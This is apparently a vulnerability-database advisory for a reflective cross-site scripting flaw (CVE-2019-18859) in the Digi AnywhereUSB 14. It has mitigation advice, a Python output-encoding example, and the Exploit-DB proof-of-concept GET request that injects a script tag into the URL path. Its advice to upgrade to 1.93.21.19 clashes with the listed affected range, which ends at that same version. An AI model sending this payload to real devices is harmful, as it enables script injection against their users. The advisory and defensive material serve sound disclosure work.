vendor: Digi AnywhereUSB 14
by: Raspina Net Pars Group
CVSS: 6.1 (MEDIUM)
Reflective Cross-Site Scripting
CWE: 79
Product Name: Digi AnywhereUSB 14
Affected Version From: 1
Affected Version To: 1.93.21.19
Patch Exists: YES
Related CVE: CVE-2019-18859
CPE: h:digi:anywhereusb_14:1.93.21.19
Metasploit:
Other Scripts:
Platforms Tested:
2019

Digi AnywhereUSB 14 – Reflective Cross-Site Scripting

The Digi AnywhereUSB 14 device is vulnerable to a reflective cross-site scripting (XSS) attack. By sending a specially crafted GET request, an attacker can inject and execute malicious script code on the target system, potentially leading to unauthorized access or data theft.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Digi AnywhereUSB 14 device to version 1.93.21.19 or later. Additionally, it is advised to implement proper input validation and output encoding to prevent XSS attacks.
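
The output-encoding advice above, shown as an added example (not code from the Exploit-DB entry or from Digi): the request target from this page's PoC is rendered into an error page with and without entity encoding. The template, the reflection points and all function names are hypothetical, since the page does not show where the firmware reflects the path.

```python
import html
from urllib.parse import quote, unquote

# Request target copied from the PoC on this page.
POC_TARGET = "//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"

# Hypothetical error page (assumption: the firmware's real template is not
# shown on the page). It reflects the path in a text node and in a quoted
# attribute, two of the contexts the PoC's "> and '> prefix tries to close.
TEMPLATE = (
    "<html><body><h1>404 Not Found</h1>"
    "<p>The requested URL {text} was not found.</p>"
    '<a href="/" title="{attr}">Home</a>'
    "</body></html>"
)


def render_vulnerable(raw_target: str) -> str:
    """Decode the request target and reflect it verbatim (CWE-79)."""
    path = unquote(raw_target)
    return TEMPLATE.format(text=path, attr=path)


def render_encoded(raw_target: str) -> str:
    """Decode first, then entity-encode at the point of output.

    html.escape(quote=True) rewrites & < > " ' and covers HTML text and
    quoted-attribute contexts only; a value placed inside a <script> block
    or a URL needs the encoder for that context instead.
    """
    path = html.escape(unquote(raw_target), quote=True)
    return TEMPLATE.format(text=path, attr=path)


def has_injected_markup(page: str) -> bool:
    """True if the page contains a script tag; the template itself has none."""
    return "<script" in page.lower()


if __name__ == "__main__":
    # Check both the literal PoC target and its percent-encoded form.
    for target in (POC_TARGET, quote(POC_TARGET, safe="/")):
        print(has_injected_markup(render_vulnerable(target)),
              has_injected_markup(render_encoded(target)))
```

Encoding is applied after URL decoding, so the percent-encoded form of the same request is neutralised as well.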

Exploit-DB raw data:

# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859

# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


# Author Website: HTTPS://RNPG.info